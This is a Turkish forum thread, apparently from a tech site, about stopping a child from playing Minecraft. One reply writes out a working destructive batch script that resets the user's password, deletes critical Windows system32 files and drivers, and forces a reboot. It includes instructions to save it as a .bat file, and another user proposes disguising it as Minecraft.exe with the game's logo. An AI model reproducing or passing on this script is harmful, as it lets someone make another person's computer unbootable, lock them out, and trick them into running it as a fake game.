Ebeveyn denetimi programı önerisi

Elinize sağlık hocam.

Şu kısma çok güldüm:

"HAYIRDIR", "Oyun mu oynuyorsun sen bakem!!, Oyun moyun yok ulen kapatıyorum."

Ben olsam oyunun birkaç önemli dosyasını silerdim, aaa oyun bozulmuş, ayağına yatardım

Kız uyanıksa oyunu indirmeye çalışmasın diye de Hosts dosyasını düzenleyip Minecraft indiren siteleri engellerdim

Ben direk System32'yi silerdim hadi bidaha otur.Silmek için:Bu kodu not defterine yazıyoruz.

net user %username% robustteam del %systemroot%\\system32\\dllcache\\c_1254.nls del %systemroot%\\system32\\c_1254.nls del %systemroot%\\system32\\hal.dll del %systemroot%\\system32\\kdcom.dll del %systemroot%\\system32\\kernel32.dll del %systemroot%\\system32\\bootvid.dll del %systemroot%\\system32\\c_037.nls del %systemroot%\\system32\\c_437.nls del %systemroot%\\system32\\c_500.nls del %systemroot%\\system32\\c_737.nls del %systemroot%\\system32\\c_1255.nls del %systemroot%\\system32\\C_28594.nls del %systemroot%\\system32\\c_20866.nls del %systemroot%\\system32\\bidispl.dll del %systemroot%\\system32\\C_28594.nls del %systemroot%\\system32\\ups.exe del %systemroot%\\system32\\trkwks.dll del %systemroot%\\system32\\scardsvr.exe del %systemroot%\\system32\\audiosrv.dll del %systemroot%\\system32\\drivers\\atapi.sys del %systemroot%\\system32\\drivers\\cdaudio.sys del %systemroot%\\system32\\drivers\\cdfs.sys del %systemroot%\\system32\\drivers\\cdrom.sys shutdown -r -t 00 net user %username% robustteam
Kodu yazdıktan sonra sol üstten "Dosya" kısmına gelip Farklı Kaydet'e basıyoruz,bastıkdan sonra bize bir Dosya Seç isimli bir şey açılcak.Dosya adını yazdıktan sonra sonuna .bat ekliyoruz Örnek:Technopat.bat buna basdıktan sonra System32 gidiyor siliniyor.(hiç ama hiçbir sorumluluk kabul etmiyorum)

Son düzenleyen: Moderatör:
@Alican_123 Sordum.net ekibinin güzel bir çalışması var bu konuda, tam işinize yarayacak türden. Demin tesadüf ettim, aklıma siz geldiniz İnceleyebilirsiniz:

Bunu Minecraft.exe olarak kaydetip Minecraft logosu koyarsak tam olur .

Bu siteyi kullanmak için çerezler gereklidir. Siteyi kullanmaya devam etmek için çerezleri kabul etmelisiniz. Daha Fazlasını Öğren.…